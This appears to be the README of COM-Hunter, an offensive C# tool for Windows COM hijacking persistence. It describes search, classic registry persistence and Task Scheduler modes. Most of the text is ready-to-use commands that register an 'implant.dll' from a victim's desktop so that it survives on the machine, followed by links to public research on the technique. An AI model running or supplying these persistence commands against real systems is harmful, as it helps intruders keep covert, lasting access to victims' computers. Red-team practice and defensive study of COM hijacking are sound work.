COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistnce tool written in C#.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on
, and registry hivesHKLM
. - Classic Persist Mode: Performs classic COM hijacking persistence using
. - Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using
This project created with ❤️ by @nickvourd && @S1ckB0y1337
ℹ️ Inspired by the RTO course from @zeropointsecltd.
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Version: 2.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <options>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
ℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.dll --localserver32
ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
- Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
- COM Objects Hijacking by Virus Total